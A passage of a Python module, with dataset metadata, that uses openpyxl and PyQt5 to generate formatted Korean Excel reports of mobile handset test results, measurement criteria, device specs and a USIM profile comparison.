sheet_in['H53'].value\n sheet_out['D46'] = sheet_in['J53'].value\n sheet_out['E46'] = sheet_in['L53'].value\n sheet_out['F46'] = sheet_in['N53'].value\n\n self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:H46\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A27'].alignment = self.top_alignment\n sheet_out['A34'].alignment = self.top_alignment\n sheet_out['A41'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:H8\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A9:F13\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A16:H20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A21:D25\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A28:E32\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A35:F39\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A42:F46\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:H46\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [29.88, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']:\n\n sheet_out[col + '4'].fill = self.brown_fill\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '6'].fill = self.apricot_fill\n sheet_out[col + '16'].fill = self.brown_fill\n sheet_out[col + '17'].fill = self.brown_fill\n sheet_out[col + '18'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F']:\n\n sheet_out[col + '9'].fill = self.brown_fill\n sheet_out[col + '10'].fill = self.brown_fill\n sheet_out[col + '11'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.brown_fill\n sheet_out[col + '36'].fill = self.brown_fill\n sheet_out[col + '37'].fill = self.apricot_fill\n sheet_out[col + '42'].fill = self.brown_fill\n sheet_out[col + '43'].fill = self.brown_fill\n sheet_out[col + '44'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E']:\n\n sheet_out[col + '28'].fill = self.brown_fill\n sheet_out[col + '29'].fill = self.brown_fill\n sheet_out[col + '30'].fill = self.apricot_fill\n\n\n for col in ['A', 'B', 'C', 'D']:\n\n sheet_out[col + '21'].fill = self.brown_fill\n sheet_out[col + '22'].fill = self.brown_fill\n sheet_out[col + '23'].fill = self.apricot_fill\n\n for i in [7, 8, 12, 13, 19, 20, 24, 25, 31, 32, 38, 39, 45, 46]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 1 측정기준 Tab\n def attach_generate_data_1(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부1. 측정기준 및 가점']\n list_band = ['Band 1 15M', 'Band 3 20M', 'Band 5 10M',\n 'Band 7 20M', 'Band 7 10M']\n list_trp_base = ['14.00dBm', '15.00dBm', '13.50dBm',\n '13.00dBm', '13.00dBm']\n list_tis_base = ['-92.00dBm', '-91.00dBm', '-87.00dBm',\n '-90.00dBm', '-93.00dBm']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부1. 측정기준 및 가점'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ RF 성능 : 기 출시 단말 측정하여 상위 70% 수준으로 설정'\n sheet_out['A4'] = ' -TRP'\n\n # 5~10 row\n sheet_out['A5'] = 'SISO LTE'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out.merge_cells('C5:D5')\n sheet_out['C5'] = '측정기준 History'\n\n for i in range(6, 11):\n sheet_out['A' + str(i)] = list_band[i - 6]\n sheet_out['B' + str(i)] = list_trp_base[i - 6]\n sheet_out.merge_cells('C6:D10')\n sheet_out['C6'] = '기준대비 1dB 증가후 +1점/1dBm 가점\\n기준대비 1dB 저하후 - 1점/1dBm 감점'\n # 11~17 row\n sheet_out['A11'] = ' -TIS (SISO LTE)'\n\n # 12~17 row\n sheet_out['A12'] = 'SISO LTE'\n sheet_out['B12'] = '기준(RHP)'\n sheet_out.merge_cells('C12:D12')\n sheet_out['C12'] = '측정기준 History'\n\n for i in range(13, 18):\n sheet_out['A' + str(i)] = list_band[i - 13]\n sheet_out['B' + str(i)] = list_trp_base[i - 13]\n sheet_out.merge_cells('C13:D17')\n sheet_out['C13'] = '기준대비 1dB 증가후 +1점/3dBm 가점\\n기준대비 1dB 저하후 - 1점/3dBm 감점'\n\n # 19~25 row\n sheet_out['A19'] = '▣ 배터리 소모전류'\n sheet_out.merge_cells('A20:D20')\n sheet_out['A20'] = \" - '18.1 ~ '19.8 납품검사 삼성/LG 단말 29종으로\\n측정 기준으로 소모전류 (평균+STD), 배터리 용량 (3000mA) 산출\"\n sheet_out.merge_cells('A21:D21')\n sheet_out['A21'] = \" - Ref. 단말 대비 10% 이내 (측정기준부재항목)\"\n\n sheet_out['A23'] = '▣ MOS'\n sheet_out.merge_cells('A24:D24')\n sheet_out['A24'] = \" - ITU-T 권고 P.800 항목에 규정 참고 (LTE : 3.5, WCDMA : 3.0)\"\n sheet_out.merge_cells('A25:D25')\n sheet_out['A25'] = '. MOS 3.5~4 : 자연스러운 통화 수준\\n. MOS 3~3.5 : 대화는 잘 이루어지지만 품질저하 느낄 수 있음'\n\n self.setPrintText('/s {}번 파일 \"첨부1\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D25\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['C6'].alignment = self.top_alignment_3\n sheet_out['A11'].alignment = self.top_alignment\n sheet_out['C13'].alignment = self.top_alignment_3\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment_3\n sheet_out['A21'].alignment = self.top_alignment\n sheet_out['A23'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D10\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A12:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D25\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n sheet_out.row_dimensions[20].height = 45\n sheet_out.row_dimensions[25].height = 45\n\n # Set Pattern Fill\n for i in [5, 12]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [5, 6, 7, 8, 9, 10, 13, 14, 15, 16, 17]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부1\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 2 측정기준 Tab\n def attach_generate_data_2(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부2. 납품검사']\n list_items = ['고온 고습/저온 Cycling 시험\t', '낙하시험', '방수시험', 'ESD (정전기) 시험',\n '개통 및 사용성 시험', 'RF Auto (50대, 제조사 자체 측정)', 'CATS_Priority1 (제조사 자체 측정)',\n 'GPS (제조사 자체 측정)', '발열 (제조사 자체 측정)', '카메라 전.후면 화질평가 (제조사 자체 측정)',\n 'WiFi 무선성능(제조사 자체 측정)', 'BT 무선성능(제조사 자체 측정)']\n list_items_2 = ['무선기기 형식등록', 'GCF 인증서', 'WiFi 인증서', 'NFC 인증서', 'Bluetooth 인증서']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부2. 납품검사'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ 장소 : (빈곳)'\n\n # 4~16 row\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = 'Item'\n sheet_out['D4'] = '결과'\n\n sheet_out.merge_cells('A5:A8')\n sheet_out['A5'] = '신뢰성 시험'\n sheet_out.merge_cells('A9:A16')\n sheet_out['A9'] = 'Performance'\n\n for i in range(5, 17):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items[i - 5]\n\n # 18~24 row\n sheet_out['A18'] = '▣ 시험 인증서 (PLM 등록)'\n sheet_out['A19'] = '구분'\n sheet_out.merge_cells('B19:C19')\n sheet_out['B19'] = 'Item'\n sheet_out['D19'] = '결과'\n\n sheet_out.merge_cells('A20:A24')\n sheet_out['A20'] = '인증서'\n\n for i in range(20, 25):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items_2[i - 20]\n\n\n self.setPrintText('/s {}번 파일 \"첨부2\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A18'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D16\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A19:D24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D24\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 23.75, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [4, 19]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in range(5,17):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n for i in range(20,25):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부2\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 3 측정기준 Tab\n def attach_generate_data_3(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부3. 단말 상세 SPEC']\n list_items = ['모뎀', 'RFIC', 'Display', '크기', '배터리 용량', 'Flash ROM', 'SRAM', '카메라', '사운드', 'MIC', '방수/방진', '페이', '생체인식',\n '충전', '기타', 'LTE 주파수', 'LTE 로밍 지원 주파수', 'WCDMA 주파수', 'OS(출시버전)', '출시']\n list_items_2 = ['5G NW options', '5G Frequency', 'UE-Category', 'Max Throughput', 'ENDC capability',\n 'LTE capability', 'Modulation', 'MIMO', 'CSI-RS', 'Power', 'Waveform']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '첨부3. 단말 상세 SPEC'\n\n # sheet row 2 handle\n sheet_out['A2'] = '▣ 기본 정보 '\n\n # 3~23 row\n sheet_out['A3'] = '구분'\n sheet_out['B3'] = '모델1'\n sheet_out['C3'] = 'Ref. 모델'\n\n for i in range(4, 24):\n sheet_out['A' + str(i)] = list_items[i - 4]\n\n # 25~37 row\n sheet_out['A25'] = '▣ N/W Feature 비교'\n sheet_out['A26'] = '구분'\n sheet_out['B26'] = '모델1'\n sheet_out['C26'] = 'Ref. 모델'\n\n for i in range(27, 38):\n sheet_out['A' + str(i)] = list_items_2[i - 27]\n\n self.setPrintText('/s {}번 파일 \"첨부3\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:C37\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A3:C23\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A26:C37\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:C3\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A4:C23\"]:\n for cell in mCell:\n cell.font = self.value_font\n for mCell in sheet_out[\"A25:C26\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A27:C37\"]:\n for cell in mCell:\n cell.font = self.value_font\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C']\n sheet_width_list = [20.13, 39, 39]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [3, 26]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n\n for i in range(4, 24):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n for i in range(27, 38):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부3\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # f2 function\n def f2_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n # option setting wb.output\n sheet_in = wb_output['Profile']\n wb_output.create_sheet('Comparison', 2)\n sheet_out = wb_output['Comparison']\n # 1st list items are fixed usim info, 2nd list items are variable usim info\n list_find = [['ESN', 'HPPLMN', 'HPLMNNWACT', 'FPLMN', 'PWS', 'HPLMNwACT', 'DOMAIN'],\n ['IMEI', 'IMSI', 'KEYS', 'KEYSPS', 'MSISDN', 'SMSP', 'PSLOCI', 'ACC', 'LOCI', 'IMSI_M',\n 'MDN', 'IRM', 'IMPI', 'IMPU', 'P_CSCF']]\n list_fixed_item = []\n list_variable_item = []\n list_reference_item = [\n '0000FFFFFFFFFFFF',\n '01',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '54F08054F06054F00354F040',\n 'FCFFFFFFFFFFFFFFFFFF',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '800A736B74696D732E6E6574FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF',\n ]\n\n total_row = len(sheet_in['A'])\n\n # sheet row 1 handle\n sheet_out.merge_cells('B1:E1')\n sheet_out['B1'] = 'USIM DATA COMPARISON'\n # sheet row 2 handle\n sheet_out['B2'] = 'EF파일명'\n sheet_out['C2'] = 'DATA값'\n sheet_out['D2'] = '고정기준값'\n sheet_out['E2'] = '비교'\n\n # finding fixed value\n for fixed in list_find[0]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == fixed:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_fixed_item.append(data)\n break\n\n # finding variable value\n for variable in list_find[1]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == variable:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_variable_item.append(data)\n break\n\n # red\n # 3~ 24 rows fill data\n # 3~9까지 fixed\n # 10~24까지 variable\n\n # all cell font adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.font = self.f2_value_font\n\n sheet_out['B1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n # 고정값 Set\n for i, f_item in enumerate(list_fixed_item):\n sheet_out['B' + str(i + 3)] = list_find[0][i]\n sheet_out['B' + str(i + 3)].fill = self.yellow_fill\n sheet_out['C' + str(i + 3)] = f_item\n sheet_out['D' + str(i + 3)] = list_reference_item[i]\n sheet_out['D' + str(i + 3)].fill = self.yellow_fill\n\n if list_fixed_item[i] == list_reference_item[i]:\n sheet_out['E' + str(i + 3)] = 'True(일치함)'\n sheet_out['E' + str(i + 3)].font = self.f2_blue_font\n else:\n sheet_out['E' + str(i + 3)] = 'False(불일치)'\n sheet_out['E' + str(i + 3)].font = self.f2_red_font\n\n sheet_out['E' + str(i + 3)].fill = self.yellow_fill\n\n # 가변값 Set\n for i, v_item in enumerate(list_variable_item):\n sheet_out['B' + str(i + 10)] = list_find[1][i]\n sheet_out['B' + str(i + 10)].fill = self.orange_fill\n sheet_out['C' + str(i + 10)] = v_item\n sheet_out['D' + str(i + 10)].fill = self.orange_fill\n sheet_out['E' + str(i + 10)].fill = self.orange_fill\n\n self.setPrintText('/s {}번 파일 \"Comparison\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n for mCell in sheet_out[\"C4:C24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n for mCell in sheet_out[\"D4:D24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # set filter\n sheet_out.auto_filter.ref = \"B2:E24\"\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [4.25, 14.75, 57, 57, 23]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['B2'].fill = self.brown_fill\n sheet_out['C2'].fill = self.brown_fill\n sheet_out['D2'].fill = self.brown_fill\n sheet_out['E2'].fill = self.brown_fill\n\n\n self.currentRow = self.currentRow + 1\n self.totalRows = self.totalRows + 1\n self.progress_flag.emit()\n self.setPrintText('/s {}번 파일 \"Comparison\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # main method\n def run(self):\n\n try:\n ###########################__Setting print Text Thread__######################\n\n self.thread_count = threading.Thread(target=self.getCountRows, args=())\n self.thread_count.daemon = True\n self.thread_count.start()\n self.nowTime = datetime.today().strftime(\"%Y-%m-%d\")\n\n #################################################################_SETTING INPUT_###########################################################################\n # Save root directory\n self.flag_root = os.path.isdir(self.home+\"\\\\Desktop\\\\DOC\\\\\")\n if not self.flag_root:\n os.mkdir(self.home + \"\\\\Desktop\\\\DOC\\\\\")\n\n # extract file name each list_files and make every out file path\n for item in self.list_files:\n temp_filename = os.path.basename(item)\n temp_filename = re.sub(\"(.xlsx|.xls)\", \"\", temp_filename)\n output_file = self.home+\"\\\\Desktop\\\\DOC\\\\result_\"+temp_filename+\"(\"+self.nowTime+\").xlsx\"\n self.list_out_files.append(output_file)\n\n if self.modeFlag == \"f1\":\n\n #################################################################_RESULT FILE Generate_###########################################################################\n # output file generate\n for item in self.list_out_files:\n\n wb = Workbook()\n s1 = wb.active\n s1.title = \"검증결과요약\"\n wb.create_sheet('시험결과요약', 1)\n wb.create_sheet('TRP', 2)\n wb.create_sheet('TIS', 3)\n wb.create_sheet('속도', 4)\n wb.create_sheet('Call Setup Test', 5)\n wb.create_sheet('주파수동조', 6)\n wb.create_sheet('MOS', 7)\n wb.create_sheet('배터리소모전류(시간)', 8)\n wb.create_sheet('배터리소모전류 세부데이터', 9)\n wb.create_sheet('배터리소모전류(DOU)', 10)\n wb.create_sheet('첨부1. 측정기준 및 가점', 11)\n wb.create_sheet('첨부2. 납품검사', 12)\n wb.create_sheet('첨부3. 단말 상세 SPEC', 13)\n wb.save(item)\n\n self.setPrintText(\"/s Complete making Result excel file /e\")\n self.setPrintText(\"/s Extract Original Data in each file /e\")\n\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n\n ########################################################################Start to generate openpyXL Sheet Style########################################################################\n # 검증결과요약 텝 생성\n self.summary_generate_data()\n self.totalRows = 1\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 시험결과요약 텝 생성\n self.test_generate_data()\n self.totalRows = 2\n self.currentRow = 0\n self.progress_flag.emit()\n\n # TRP 텝 생성\n self.trp_generate_data()\n self.totalRows = 3\n self.currentRow = 0\n self.progress_flag.emit()\n\n # TIS 텝 생성\n self.tis_generate_data()\n self.totalRows = 4\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 속도 텝 생성\n self.spd_generate_data()\n self.totalRows = 5\n self.currentRow = 0\n self.progress_flag.emit()\n\n # Call Setup Test 텝 생성\n self.call_generate_data()\n self.totalRows = 6\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 주파수동조 텝 생성\n self.fre_generate_data()\n self.totalRows = 7\n self.currentRow = 0\n self.progress_flag.emit()\n\n # MOS 텝 생성\n self.mos_generate_data()\n self.totalRows = 8\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류(DOU) 텝 생성\n self.dou_generate_data()\n self.totalRows = 9\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.bat_generate_data()\n self.totalRows = 10\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.time_generate_data()\n self.totalRows = 11\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.attach_generate_data_1()\n self.totalRows = 12\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.attach_generate_data_2()\n self.totalRows = 13\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.attach_generate_data_3()\n self.totalRows = 14\n self.currentRow = 0\n self.progress_flag.emit()\n\n #############################################__progress 100%__#############################################\n self.end_count = \"y\"\n self.end_flag.emit()\n\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n else:\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n self.f2_generate_data()\n self.end_count = \"y\"\n self.end_flag.emit()\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\nif __name__ == '__main__':\n moduler = Formater('C:\\\\Users\\\\TestEnC\\\\Desktop\\\\VOC\\\\input_sample.xlsx', 'y', 'f1')\n moduler.run()\n", "sub_path": "docBeFormater/newModule.py", "file_name": "newModule.py", "file_ext": "py", "file_size_in_byte": 171877, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread.__init__", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 48, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 53, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 60, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 61, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 62, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 63, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 64, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 65, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 66, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 67, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 68, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 71, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 72, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 73, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 74, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 75, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 76, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 77, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 80, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 81, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 82, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 83, "usage_type": "call"}, {"api_name": "openpyxl.styles.borders.Border", "line_number": 86, "usage_type": "call"}, {"api_name": "openpyxl.styles.borders.Side", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 107, 